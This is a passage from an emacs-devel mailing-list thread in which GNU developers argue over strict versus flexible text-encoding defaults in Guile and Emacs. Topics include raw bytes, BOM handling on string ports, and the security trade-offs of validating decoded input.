> for implementing Emacs-like behavior because "encode invalid bytes into
> something libunistring can deal with transparently" is not part of its
> recovery strategies.  Once you _have_ a useful encoding into the space
> of properly working strings, _any_ recovery strategy is easy to
> implement on top of that.
>
> For a platform, being forced to a closed set of behaviors is an
> extremely limiting choice.

How many times do I have to repeat it?  I agree we should provide an
*option* for doing what you want.  No matter how many times I say it,
you keep pretending that I didn't say it, and spreading FUD about Guile
"forcing" policies on applications.

What you wrote above simply shows your ignorance of Guile.  Yes, we use
libunistring for some things, but we do _not_ use it for character
encoding conversions.  For that we use iconv, which gives us all the
tools we need to provide Emacs-like behavior.

Stop setting up strawmen and hacking away at them.  I've got better
things to do with my time than countering your endless stream of FUD,
which by now has been featured on LWN.

     Mark



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-09  9:22                                                               ` David Kastrup
@ 2014-10-13  3:04                                                                 ` Mark H Weaver
  2014-10-13  7:41                                                                   ` David Kastrup
  0 siblings, 1 reply; 261+ messages in thread
From: Mark H Weaver @ 2014-10-13  3:04 UTC (permalink / raw)
  To: David Kastrup
  Cc: rms, dmantipov, emacs-devel, handa, monnier, Eli Zaretskii,
	stephen

David Kastrup <dak@gnu.org> writes:

> Eli Zaretskii <eliz@gnu.org> writes:
>
>>> From: David Kastrup <dak@gnu.org>
>>> Cc: rms@gnu.org, mhw@netris.org, dmantipov@yandex.ru,
>>> emacs-devel@gnu.org, handa@gnu.org, monnier@iro.umontreal.ca,
>>> stephen@xemacs.org
>>> Date: Thu, 09 Oct 2014 09:52:31 +0200
>>> 
>>> I still don't want the autosave of mail to complain about bad
>>> characters.
>>
>> We write the auto-save files in the internal format, so it never
>> complains.
>
> If you are not allowed or able to do that...  At the current point of
> time, the only round-trippable encoding for bytes that GUILE offers is
> latin-1, and the only round-trippable encoding for characters is utf-8.

"Not allowed"?  Another strawman.  I guess it's a waste of time for me
to say, yet again, that we'll support the "raw bytes" encodings, because
you'll just keep on pretending that we won't allow it.

> The conceptual lack of separation between internal and external utf-8
> encoding leads to strangenesses like
>
> scheme@(guile-user)> (with-input-from-string "\ufeff!" read-char)
> $8 = #\!
>
> Yes, this is a string->string operation losing a byte order mark in
> spite of no indication that I would like to get encodings involved in
> any manner.

Byte Order Marks are an ugly corner of Unicode, and I spent a lot of
effort to try to do the right thing here.  What we do in Guile is
described here:

  https://www.gnu.org/software/guile/manual/html_node/BOM-Handling.html

I agree that we should inhibit BOM handling for string ports.

> And when I can say "let's see where this kind of thinking will lead" and
> find a hole to poke within a minute,

BTW, your claim that you found this hole "within a minute" is a
bald-faced lie and you know it.  In <http://bugs.gnu.org/18520>, I
stated my belief that our internal use of UTF-8 in string ports was not
visible to the application as long as you didn't manually change the
encoding for the string port or use seek/ftell.  That was on Sept 24th.

You spent a *lot* of time arguing with us in that bug report, and this
is exactly the observation you could have used to bolster your argument,
but you never found it until now.

      Mark



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-12  5:47                                                                     ` Eli Zaretskii
@ 2014-10-13  3:07                                                                       ` Richard Stallman
  2014-10-13  3:38                                                                       ` Richard Stallman
  1 sibling, 0 replies; 261+ messages in thread
From: Richard Stallman @ 2014-10-13  3:07 UTC (permalink / raw)
  To: Eli Zaretskii; +Cc: dak, mhw, dmantipov, emacs-devel, handa, monnier, stephen

[[[ To any NSA and FBI agents reading my email: please consider    ]]]
[[[ whether defending the US Constitution against all enemies,     ]]]
[[[ foreign or domestic, requires you to follow Snowden's example. ]]]

    > Assume that any operation which decodes text _for a user to see_
    > will specify flexible decoding.

    That means almost all of them, more-or-less.  So it goes against what
    AFAIU Mark had in mind with "struct UTF-8".

I don't think so.  I think he is talking about operations OTHER THAN
those that decode text to put it in a buffer and show it to a user.

-- 
Dr Richard Stallman
President, Free Software Foundation
51 Franklin St
Boston MA 02110
USA
www.fsf.org  www.gnu.org
Skype: No way! That's nonfree (freedom-denying) software.
  Use Ekiga or an ordinary phone call.




^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-12 14:49                                                                             ` Stephen J. Turnbull
  2014-10-12 16:50                                                                               ` David Kastrup
@ 2014-10-13  3:08                                                                               ` Richard Stallman
  2014-10-13  4:50                                                                                 ` Stephen J. Turnbull
  2014-10-13  3:41                                                                               ` Richard Stallman
  2 siblings, 1 reply; 261+ messages in thread
From: Richard Stallman @ 2014-10-13  3:08 UTC (permalink / raw)
  To: Stephen J. Turnbull; +Cc: dak, emacs-devel

[[[ To any NSA and FBI agents reading my email: please consider    ]]]
[[[ whether defending the US Constitution against all enemies,     ]]]
[[[ foreign or domestic, requires you to follow Snowden's example. ]]]

    Sigh.  It is *Emacs* that assumes the world is full of valid data, and
    happily shovels any hazmat it receives on to the next user or program
    without validation.  And you're right, it *is* a security problem.

It is not much of a security problem in Emacs.

The defaults for the standard Guile primitives could be strict,
and the defaults for some Emacs Lisp functions could be flexible.

-- 
Dr Richard Stallman
President, Free Software Foundation
51 Franklin St
Boston MA 02110
USA
www.fsf.org  www.gnu.org
Skype: No way! That's nonfree (freedom-denying) software.
  Use Ekiga or an ordinary phone call.




^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-12  5:22                                                                     ` David Kastrup
@ 2014-10-13  3:09                                                                       ` Richard Stallman
  2014-10-13  3:44                                                                       ` Richard Stallman
  1 sibling, 0 replies; 261+ messages in thread
From: Richard Stallman @ 2014-10-13  3:09 UTC (permalink / raw)
  To: David Kastrup; +Cc: mhw, dmantipov, emacs-devel, handa, monnier, eliz, stephen

[[[ To any NSA and FBI agents reading my email: please consider    ]]]
[[[ whether defending the US Constitution against all enemies,     ]]]
[[[ foreign or domestic, requires you to follow Snowden's example. ]]]

    >     What will Emacs do, under this proposal, if the user is asked whether
    >     to keep the original raw bytes and answers NO?
    >
    > Abort the operation, I suppose.

    It's going to be a wagonload of fun if I do

    emacsclient `git grep -l some-pattern`

    in order to edit 30 files and Emacs decides to abort and/or ask each
    time a comment contains a stray latin-1 character.

I presume not many of these files will have raw bytes in them
if they are in a system that is being properly maintained.

But it occurs to me that there could be another option to offer users
on such occasions: to convert the raw bytes to Unicode characters
assuming that they were meant to be Latin-N (the user can pick the N).

-- 
Dr Richard Stallman
President, Free Software Foundation
51 Franklin St
Boston MA 02110
USA
www.fsf.org  www.gnu.org
Skype: No way! That's nonfree (freedom-denying) software.
  Use Ekiga or an ordinary phone call.




^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-12  5:54                                                               ` Eli Zaretskii
@ 2014-10-13  3:10                                                                 ` Richard Stallman
  2014-10-13  5:35                                                                   ` Stephen J. Turnbull
  2014-10-13  5:43                                                                   ` Eli Zaretskii
  2014-10-13  3:46                                                                 ` Richard Stallman
  1 sibling, 2 replies; 261+ messages in thread
From: Richard Stallman @ 2014-10-13  3:10 UTC (permalink / raw)
  To: Eli Zaretskii
  Cc: dak, mikegerwitz, mhw, dmantipov, emacs-devel, handa, monnier,
	stephen

[[[ To any NSA and FBI agents reading my email: please consider    ]]]
[[[ whether defending the US Constitution against all enemies,     ]]]
[[[ foreign or domestic, requires you to follow Snowden's example. ]]]

    >     And, of course, when you invoke a program locally, there's usually no
    >     protocol at all involved.
    > 
    > Likewise, we need to look at some real cases.

    Not sure what you mean by that.  M-! and M-| is what I had in mind.

This may be a big miscommunication.  I think the people who want
strict encoding are talking about network communication using
open-network-stream.

But it would be good if they presented some examples to make it
clear what cases they are talking about.

-- 
Dr Richard Stallman
President, Free Software Foundation
51 Franklin St
Boston MA 02110
USA
www.fsf.org  www.gnu.org
Skype: No way! That's nonfree (freedom-denying) software.
  Use Ekiga or an ordinary phone call.




^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-12  5:47                                                                     ` Eli Zaretskii
  2014-10-13  3:07                                                                       ` Richard Stallman
@ 2014-10-13  3:38                                                                       ` Richard Stallman
  1 sibling, 0 replies; 261+ messages in thread
From: Richard Stallman @ 2014-10-13  3:38 UTC (permalink / raw)
  To: Eli Zaretskii; +Cc: dak, mhw, dmantipov, emacs-devel, handa, monnier, stephen

[[[ To any NSA and FBI agents reading my email: please consider    ]]]
[[[ whether defending the US Constitution against all enemies,     ]]]
[[[ foreign or domestic, requires you to follow Snowden's example. ]]]

    > Assume that any operation which decodes text _for a user to see_
    > will specify flexible decoding.

    That means almost all of them, more-or-less.  So it goes against what
    AFAIU Mark had in mind with "struct UTF-8".

I don't think so.  I think he is talking about operations OTHER THAN
those that decode text to put it in a buffer and show it to a user.

-- 
Dr Richard Stallman
President, Free Software Foundation
51 Franklin St
Boston MA 02110
USA
www.fsf.org  www.gnu.org
Skype: No way! That's nonfree (freedom-denying) software.
  Use Ekiga or an ordinary phone call.




^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-12 14:49                                                                             ` Stephen J. Turnbull
  2014-10-12 16:50                                                                               ` David Kastrup
  2014-10-13  3:08                                                                               ` Richard Stallman
@ 2014-10-13  3:41                                                                               ` Richard Stallman
  2 siblings, 0 replies; 261+ messages in thread
From: Richard Stallman @ 2014-10-13  3:41 UTC (permalink / raw)
  To: Stephen J. Turnbull; +Cc: dak, emacs-devel

[[[ To any NSA and FBI agents reading my email: please consider    ]]]
[[[ whether defending the US Constitution against all enemies,     ]]]
[[[ foreign or domestic, requires you to follow Snowden's example. ]]]

    Sigh.  It is *Emacs* that assumes the world is full of valid data, and
    happily shovels any hazmat it receives on to the next user or program
    without validation.  And you're right, it *is* a security problem.

It is not much of a security problem in Emacs.

The defaults for the standard Guile primitives could be strict,
and the defaults for some Emacs Lisp functions could be flexible.

-- 
Dr Richard Stallman
President, Free Software Foundation
51 Franklin St
Boston MA 02110
USA
www.fsf.org  www.gnu.org
Skype: No way! That's nonfree (freedom-denying) software.
  Use Ekiga or an ordinary phone call.




^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-12  5:22                                                                     ` David Kastrup
  2014-10-13  3:09                                                                       ` Richard Stallman
@ 2014-10-13  3:44                                                                       ` Richard Stallman
  2014-10-13  7:59                                                                         ` David Kastrup
  1 sibling, 1 reply; 261+ messages in thread
From: Richard Stallman @ 2014-10-13  3:44 UTC (permalink / raw)
  To: David Kastrup; +Cc: mhw, dmantipov, emacs-devel, handa, monnier, eliz, stephen

[[[ To any NSA and FBI agents reading my email: please consider    ]]]
[[[ whether defending the US Constitution against all enemies,     ]]]
[[[ foreign or domestic, requires you to follow Snowden's example. ]]]

    >     What will Emacs do, under this proposal, if the user is asked whether
    >     to keep the original raw bytes and answers NO?
    >
    > Abort the operation, I suppose.

    It's going to be a wagonload of fun if I do

    emacsclient `git grep -l some-pattern`

    in order to edit 30 files and Emacs decides to abort and/or ask each
    time a comment contains a stray latin-1 character.

I presume not many of these files will have raw bytes in them
if they are in a system that is being properly maintained.

But it occurs to me that there could be another option to offer users
on such occasions: to convert the raw bytes to Unicode characters
assuming that they were meant to be Latin-N (the user can pick the N).

-- 
Dr Richard Stallman
President, Free Software Foundation
51 Franklin St
Boston MA 02110
USA
www.fsf.org  www.gnu.org
Skype: No way! That's nonfree (freedom-denying) software.
  Use Ekiga or an ordinary phone call.




^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-12  5:54                                                               ` Eli Zaretskii
  2014-10-13  3:10                                                                 ` Richard Stallman
@ 2014-10-13  3:46                                                                 ` Richard Stallman
  1 sibling, 0 replies; 261+ messages in thread
From: Richard Stallman @ 2014-10-13  3:46 UTC (permalink / raw)
  To: Eli Zaretskii
  Cc: dak, mikegerwitz, mhw, dmantipov, emacs-devel, handa, monnier,
	stephen

[[[ To any NSA and FBI agents reading my email: please consider    ]]]
[[[ whether defending the US Constitution against all enemies,     ]]]
[[[ foreign or domestic, requires you to follow Snowden's example. ]]]

    >     And, of course, when you invoke a program locally, there's usually no
    >     protocol at all involved.
    > 
    > Likewise, we need to look at some real cases.

    Not sure what you mean by that.  M-! and M-| is what I had in mind.

This may be a big miscommunication.  I think the people who want
strict encoding are talking about network communication using
open-network-stream.

But it would be good if they presented some examples to make it
clear what cases they are talking about.

-- 
Dr Richard Stallman
President, Free Software Foundation
51 Franklin St
Boston MA 02110
USA
www.fsf.org  www.gnu.org
Skype: No way! That's nonfree (freedom-denying) software.
  Use Ekiga or an ordinary phone call.




^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-13  2:40                                                                                 ` Mark H Weaver
@ 2014-10-13  4:49                                                                                   ` Mark H Weaver
  0 siblings, 0 replies; 261+ messages in thread
From: Mark H Weaver @ 2014-10-13  4:49 UTC (permalink / raw)
  To: David Kastrup; +Cc: Stephen J. Turnbull, emacs-devel

I wrote:
> What you wrote above simply shows your ignorance of Guile.  Yes, we use
> libunistring for some things, but we do _not_ use it for character
> encoding conversions.  For that we use iconv, which gives us all the
> tools we need to provide Emacs-like behavior.

It turns out I was partially mistaken.  We use iconv in some places and
libunistring in some others.  Anyway, it seems that I have lost my
temper with David, which is embarrassing.  I'd best drop out of this
conversation now.

      Mark



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-13  3:08                                                                               ` Richard Stallman
@ 2014-10-13  4:50                                                                                 ` Stephen J. Turnbull
  0 siblings, 0 replies; 261+ messages in thread
From: Stephen J. Turnbull @ 2014-10-13  4:50 UTC (permalink / raw)
  To: rms; +Cc: dak, emacs-devel

Richard Stallman writes:

 > The defaults for the standard Guile primitives could be strict,
 > and the defaults for some Emacs Lisp functions could be flexible.

Which is precisely what I proposed from the beginning[1], and as I
understand his posts, it is what Mark has had in mind throughout as
well.

Speaking *only* for myself, I would *prefer* defaults for text coding
set by Emacs to be strict, and I believe that is both in the average
user's interest and not too inconvenient *in today's environment*.[2]
But it should be easy for applications and modes to say to Emacs "do
what you would have done in Emacs 24" and "do what you would have done
in Emacs 24 *except* apply a strict(er) error handling on invalid
encoding".

Experience may show that my preferred default is too strict for Emacs,
even today, but I believe it is the place to start.

FWIW IMHO YMMV


Footnotes: 
[1]  Although my expression of that proposal seems to have been
unintelligible.  Sorry!

[2]  tl;dr

UTF-8 is rapidly becoming the preferred encoding for many natural
languages, although China encourages GB18030 by law and Japan and
Russia both maintain their historical Babel of encodings.  Protocols
are both becoming stricter about validation, and using the sensible
default of UTF-8.  Internet protocols, where security is a very
important aspect, are gradually shifting from insisting on ASCII to
defaulting to UTF-8 (although often in some kind of "ASCII-armored"
encoding such as BASE64 or punycode).

So in general, with a few application-specific exceptions (hello,
AUCTeX), both users and applications should encounter far fewer
instances of broken encoding than in the era when the experiments Eli
and David refer to were conducted.  This is somewhat supported by the
fact that at least one major dynamic language (Python) doesn't even
provide an encoding detection function in its standard library.  The
typical range of use cases is different, granted, but editing
applications (the IDLE IDE and the IPython "notebook" facility) don't
seem to have issues with defaulting to "strict".




^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-13  3:10                                                                 ` Richard Stallman
@ 2014-10-13  5:35                                                                   ` Stephen J. Turnbull
  2014-10-13  6:02                                                                     ` Eli Zaretskii
                                                                                       ` (2 more replies)
  2014-10-13  5:43                                                                   ` Eli Zaretskii
  1 sibling, 3 replies; 261+ messages in thread
From: Stephen J. Turnbull @ 2014-10-13  5:35 UTC (permalink / raw)
  To: rms
  Cc: dak, handa, mhw, dmantipov, emacs-devel, mikegerwitz, monnier,
	Eli Zaretskii

Richard Stallman writes:

 > I think the people who want strict encoding are talking about
 > network communication using open-network-stream.

Speaking only for myself, no, I mean all octet streams purported to
be encoded text, network or local.  Network streams can only be
considered safe in very carefully maintained environments, so the
risks are greatest there.

But there's no such thing as a truly local stream, since any given
stream may be a file downloaded from the network or provided by an
application of uncertain provenance.  There are three cases of
interest, AFAICS:

(1) The file or application is truly local, provided with the OS or
    created by the user.  In that case on a well-maintained system,
    the encoding should be valid, as you pointed out elsewhere.
    Therefore a strict policy should be transparent.  (See (3) for
    what I believe to be the main class of exceptions.)

(2) The file or application was downloaded from the network.  Emacs
    cannot know the provenance, and so the same care should be taken
    as with a network stream.

(3) The application is trustworthy, but produces invalid encoded text
    in some well-understood situations.  In this case the Lisp program
    should be allowed to opt out of default validation and provide its
    own.  Preferably only in the specific situations rather than
    globally.

An example of (3) is David's case, with AUCTeX handling of TeX error
messages containing non-unibyte text.)  AFAIK such applications are
quite rare nowadays.  TeX is a special case because it is one of the
few applications whose behavior is specified extremely precisely but
in an encoding-oblivious way.[1]

As an example of special validation in (3), AIUI in TeX error
messages, only a very few leading and trailing bytes of quoted source
text should be invalid.  Thus the rest should be valid, and the user
probably should be notified of unexpected rawbytes.  (That's up to the
Lisp programmer, of course.  Still I think such flexible validation is
in the user's interest if the programmer is willing to provide it.)

I am unaware of other large classes of exceptional cases in modern
GNU/Linux systems, or the major proprietary OSes.

I understand David and Eli to be of the opinion that in practice there
is insignificant risk to Emacs or its users from any form of invalid
or malicious input, from the network or local.  I disagree.

Footnotes: 
[1]  I'm referring to the TRIP test.  This specification effectively
assumes a unibyte encoding, and so it is likely to be very difficult
to create a TeX implementation that handles Unicode conformant to the
standard *and* passes TRIP.  I'll take a TeX that passes TRIP any day!




^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-13  3:10                                                                 ` Richard Stallman
  2014-10-13  5:35                                                                   ` Stephen J. Turnbull
@ 2014-10-13  5:43                                                                   ` Eli Zaretskii
  2014-10-14  2:09                                                                     ` Richard Stallman
  1 sibling, 1 reply; 261+ messages in thread
From: Eli Zaretskii @ 2014-10-13  5:43 UTC (permalink / raw)
  To: rms; +Cc: dak, mikegerwitz, mhw, dmantipov, emacs-devel, handa, monnier,
	stephen

> Date: Sun, 12 Oct 2014 23:10:11 -0400
> From: Richard Stallman <rms@gnu.org>
> CC: dak@gnu.org, mikegerwitz@gnu.org, mhw@netris.org,
> 	dmantipov@yandex.ru, emacs-devel@gnu.org, handa@gnu.org,
> 	monnier@iro.umontreal.ca, stephen@xemacs.org
> 
>     >     And, of course, when you invoke a program locally, there's usually no
>     >     protocol at all involved.
>     > 
>     > Likewise, we need to look at some real cases.
> 
>     Not sure what you mean by that.  M-! and M-| is what I had in mind.
> 
> This may be a big miscommunication.  I think the people who want
> strict encoding are talking about network communication using
> open-network-stream.

That distinction is quite blurred in latest Emacs versions.  E.g.,
shell-command-to-string might call a process on a remote host and
communicate with it via open-network-stream or some such.  There are
several interactive commands already that use this feature.



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-13  5:35                                                                   ` Stephen J. Turnbull
@ 2014-10-13  6:02                                                                     ` Eli Zaretskii
  2014-10-13  8:24                                                                       ` Stephen J. Turnbull
  2014-10-13 14:55                                                                     ` Paul Eggert
  2014-10-14  2:11                                                                     ` Richard Stallman
  2 siblings, 1 reply; 261+ messages in thread
From: Eli Zaretskii @ 2014-10-13  6:02 UTC (permalink / raw)
  To: Stephen J. Turnbull
  Cc: dak, rms, handa, mhw, dmantipov, emacs-devel, mikegerwitz,
	monnier

> From: "Stephen J. Turnbull" <stephen@xemacs.org>
> Cc: Eli Zaretskii <eliz@gnu.org>,
>     dak@gnu.org,
>     mikegerwitz@gnu.org,
>     mhw@netris.org,
>     dmantipov@yandex.ru,
>     emacs-devel@gnu.org,
>     handa@gnu.org,
>     monnier@iro.umontreal.ca
> Date: Mon, 13 Oct 2014 14:35:02 +0900
> 
> (1) The file or application is truly local, provided with the OS or
>     created by the user.  In that case on a well-maintained system,
>     the encoding should be valid, as you pointed out elsewhere.
>     Therefore a strict policy should be transparent.  (See (3) for
>     what I believe to be the main class of exceptions.)
> 
> (2) The file or application was downloaded from the network.  Emacs
>     cannot know the provenance, and so the same care should be taken
>     as with a network stream.
> 
> (3) The application is trustworthy, but produces invalid encoded text
>     in some well-understood situations.  In this case the Lisp program
>     should be allowed to opt out of default validation and provide its
>     own.  Preferably only in the specific situations rather than
>     globally.

There's also the case that the application was invoked on a remote
host, and its output is passed via the network (a.k.a. "Tramp").  Not
sure if those 3 cases cover that.

> An example of (3) is David's case, with AUCTeX handling of TeX error
> messages containing non-unibyte text.)  AFAIK such applications are
> quite rare nowadays.

"Rare" doesn't mean unimportant to users to the degree we can ignore
them.  If we do want to cater to those "rare" cases, the only way of
doing that is maintain a database of programs and their behaviors.  We
don't have that now, and I'm not sure how practical this could be, and
what kind of maintenance burden it would require to keep the database
up to date.

Moreover, I don't think case (1) is as easy as you seem to think.  The
current Emacs policy is to use the locale-specific encoding, but that
is just a heuristic that could easily be false, as modern distributed
network-based computing doesn't lend itself well to the notion of a
fixed locale with a single encoding.  In many cases, a file or a
program that you think are "local" really aren't.

> I understand David and Eli to be of the opinion that in practice there
> is insignificant risk to Emacs or its users from any form of invalid
> or malicious input, from the network or local.  I disagree.

I never said anything like that.  I simply don't have the expertise to
assess the real amount of risk associated with this particular aspect
of Emacs.  All I can cite is my own experience.

What I did say, and stand by, is that doing what you suggest is
certain to cause user outcry of the kind I remember very well.  I
think it's naive to assume that "this time it will be different";
experience has taught me that this attitude is ill-advised.

Therefore, I think Emacs should only go to the kind of strict defaults
you propose if _users_ demand that, or if real-life Emacs use stories
show up that demonstrate the actual danger from using the current
default.  We shouldn't do that out of our own initiative based on
academic considerations and examples from PHP or whatever.



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-13  3:04                                                                 ` Mark H Weaver
@ 2014-10-13  7:41                                                                   ` David Kastrup
  0 siblings, 0 replies; 261+ messages in thread
From: David Kastrup @ 2014-10-13  7:41 UTC (permalink / raw)
  To: Mark H Weaver
  Cc: rms, dmantipov, emacs-devel, handa, monnier, Eli Zaretskii,
	stephen

Mark H Weaver <mhw@netris.org> writes:

> David Kastrup <dak@gnu.org> writes:
>
>> The conceptual lack of separation between internal and external utf-8
>> encoding leads to strangenesses like
>>
>> scheme@(guile-user)> (with-input-from-string "\ufeff!" read-char)
>> $8 = #\!
>>
>> Yes, this is a string->string operation losing a byte order mark in
>> spite of no indication that I would like to get encodings involved in
>> any manner.
>
> Byte Order Marks are an ugly corner of Unicode, and I spent a lot of
> effort to try to do the right thing here.  What we do in Guile is
> described here:
>
>   https://www.gnu.org/software/guile/manual/html_node/BOM-Handling.html
>
> I agree that we should inhibit BOM handling for string ports.
>
>> And when I can say "let's see where this kind of thinking will lead" and
>> find a hole to poke within a minute,
>
> BTW, your claim that you found this hole "within a minute" is a
> bald-faced lie and you know it.

> In <http://bugs.gnu.org/18520>, I stated my belief that our internal
> use of UTF-8 in string ports was not visible to the application as
> long as you didn't manually change the encoding for the string port or
> use seek/ftell.  That was on Sept 24th.

Uh, my claim was not that I found this problem a minute after first
thinking about GUILE's string handling.  It was more about how long it
took me after deciding to look for an example for _this_ discussion.
Now my above description may not be accurate since "let's see where this
kind of thinking will lead" is obviously not something that occured to
me just these days, or even these years.  So it applied to the more
concrete case of reading in the GUILE manual about its BOM handling,
making the connection to string ports, thinking "now that's likely to be
another half-baked bean", and finding that issue by experiment.

To the best of my memory, this _was_ the first time I read about BOM
handling in GUILE.  That does not mean that I can vouch for this page
never having been on-screen before, or even me having skimmed through
it.  But it definitely is the first time I remember having read it now.

> You spent a *lot* of time arguing with us in that bug report, and this
> is exactly the observation you could have used to bolster your
> argument, but you never found it until now.

Because I did not look for it before.  At any rate, in relation to that
bug report I had a different actual example exposed in
<URL:http://debbugs.gnu.org/cgi/bugreport.cgi?bug=18520#41> (for which I
provided a patch in
<URL:http://debbugs.gnu.org/cgi/bugreport.cgi?bug=18536>). Here the
attempt to create an open-coded fast path to speed up a few gratuitous
conversions when reading numbers from a string port (encode to UTF-8
because string ports are implemented as byte streams, decode when
reading, reencode when ungetting the non-digit read after the last
digit, redecode when reading it again...).  I think it was more or less
sorted into the "one bug does not demonstrate a problem" category.

That bug jumped out at me not when I was searching for a redecoding
problem but rather when I looked at the code in ports.c (which that
issue was about) after musing "how are they going to unread in a string
port?".  And the open-coded conversion was there to to avoid calling the
apparently slow libunistring (yes, libunistring) function
u32_conv_to_encoding
<URL:https://www.gnu.org/software/libunistring/manual/html_node/uniconv_002eh.html>.

Bugs happen.  But code that is not called in the first place can cause
no bug.

At any rate, when looking for a snappy "this might not work well with
reencoding example" on the Emacs Lisp, I first looked at surrogate
words.

Well, (integer->char #xd800) throws an out-of-range error.  So one is
not even allowed to talk about surrogate words at the character/word
level, look for them with regular expressions and so on.

I have some choice words for that as well, but it's not a bug.  It's
pretty much a necessary consequence of the design that does not give
representation to input outside of the proper UTF-8 range.  Since "not
practical" was already cried down as a consideration in this discussion,
I wanted an actual bug rather than just a refusal to work with things
defined as invalid.

So I looked in the GUILE manual to see whether I could find something
about surrogate words and instead chanced upon "BOM" which apparently
_was_ allowed into strings, so I just thought "oh, that could be an
equally bad can of worms".  And admittedly, my first try was using the
string port in the other direction, namely with-output-to-string.  From
the description I'd have expected _that_ to blow up rather than the
other way round.

And the time from "oh, this one could be bad as well" to finding the
problem (I am not even sure it is a bug rather than a particularly
jarring but logical consequence of the way string ports are defined in
GUILE as a byte stream with encoding) was not more than a few minutes at
best.  A fix will likely be equally fast to do, and there is a school
that every sufficiently patched-up software is indistinguishable from
design.

So that's the history of this bald-faced lie of mine.  I am sure that
I offer better opportunities for ad hominem attacks than that.

-- 
David Kastrup



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-13  3:44                                                                       ` Richard Stallman
@ 2014-10-13  7:59                                                                         ` David Kastrup
  2014-10-13  8:32                                                                           ` Eli Zaretskii
  0 siblings, 1 reply; 261+ messages in thread
From: David Kastrup @ 2014-10-13  7:59 UTC (permalink / raw)
  To: Richard Stallman
  Cc: mhw, dmantipov, emacs-devel, handa, monnier, eliz, stephen

Richard Stallman <rms@gnu.org> writes:

> [[[ To any NSA and FBI agents reading my email: please consider    ]]]
> [[[ whether defending the US Constitution against all enemies,     ]]]
> [[[ foreign or domestic, requires you to follow Snowden's example. ]]]
>
>     >     What will Emacs do, under this proposal, if the user is asked whether
>     >     to keep the original raw bytes and answers NO?
>     >
>     > Abort the operation, I suppose.
>
>     It's going to be a wagonload of fun if I do
>
>     emacsclient `git grep -l some-pattern`
>
>     in order to edit 30 files and Emacs decides to abort and/or ask each
>     time a comment contains a stray latin-1 character.
>
> I presume not many of these files will have raw bytes in them
> if they are in a system that is being properly maintained.

Like trailing spaces on a line and missing newlines before an end of
file and other whitespace errors: any attempt of correcting those
automatically or prompting for correcting them when you are just working
with material you got from someone else is going to annoy people and
cause problems.

Syntax highlighting may want to point such things out.  That's perfectly
fine.  But anything that disrupts interactive work is out.  I don't want
gratuitous random prompts interfering with the operation of keyboard
macros, for example.

Emacs' current behaviors are the result of dozens of years of user
experience and feedback.  Our current choices are not random.

-- 
David Kastrup



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-13  6:02                                                                     ` Eli Zaretskii
@ 2014-10-13  8:24                                                                       ` Stephen J. Turnbull
  2014-10-13  8:58                                                                         ` David Kastrup
  2014-10-13  9:05                                                                         ` Eli Zaretskii
  0 siblings, 2 replies; 261+ messages in thread
From: Stephen J. Turnbull @ 2014-10-13  8:24 UTC (permalink / raw)
  To: Eli Zaretskii
  Cc: dak, rms, mikegerwitz, mhw, dmantipov, emacs-devel, handa,
	monnier

Eli Zaretskii writes:

 > There's also the case that the application was invoked on a remote
 > host, and its output is passed via the network (a.k.a. "Tramp").  Not
 > sure if those 3 cases cover that.

My three cases were intended to cover the "local" case, where the user
presumably has control of the files on her system.  The case you are
describing is covered under network streams as far as I'm concerned
(YMMV, that's just the way I broke things down).

 > > An example of (3) is David's case, with AUCTeX handling of TeX error
 > > messages containing non-unibyte text.)  AFAIK such applications are
 > > quite rare nowadays.
 > 
 > "Rare" doesn't mean unimportant to users to the degree we can ignore
 > them.  If we do want to cater to those "rare" cases, the only way of
 > doing that is maintain a database of programs and their behaviors.

That's my main strategy, yes.  We have `file-coding-system-alist' for
filename cases, similar features for process and network streams, and
individual modes such as AUCTeX are developed by hackers who have
proved themselves able to take care of themselves.  Emacs can also
provide a way for individual users to opt out of the default
validation mode persistently (eg, provide a global default variable
and use novice mode for the opt-out).

 > Moreover, I don't think case (1) is as easy as you seem to think.

Eli, I live in encoding hell, aka Japan, and have to deal with Chinese
as well (Chinese students often use GB encodings to write Japanese).
Please give me credit for extensive experience with not only broken
implementations, but also bloodyminded standards bodies and users only
half as witty as they think they are.  Nevertheless, things are much
better today than in the days when Erik Naggum declared that "Emacs
has a fatal disease, and its name is 'MULE'".

 > In many cases, a file or a program that you think are "local"
 > really aren't.

Just because a user thinks it local doesn't lower the risk associated
with networks, although it may be somewhat lower than the open
Internet.  This is in the same risk class as other network streams.

I suppose it would be reasonable to distinguish between Internet
streams, local network streams (but only if a valid certificate was
presented, otherwise there's little reason to be confident), and local
files or processes.  But doing that conveniently and accurately sounds
like a painstaking task.

 > > I understand David and Eli to be of the opinion that in practice there
 > > is insignificant risk to Emacs or its users from any form of invalid
 > > or malicious input, from the network or local.  I disagree.
 > 
 > I never said anything like that.

No, you didn't.  I infer it from the policies for Emacs you advocate.

 > What I did say, and stand by, is that doing what you suggest is
 > certain to cause user outcry of the kind I remember very well.

It won't.  There may be outcry, but the world has changed dramatically
from the times you remember, and the outcry will be different (except
for users like yourself who were there at the time and will be upset
by the "regression"[1]).

 > I think it's naive to assume that "this time it will be different";
 > experience has taught me that this attitude is ill-advised.

I don't assume it.  I know for a fact that the world is much more
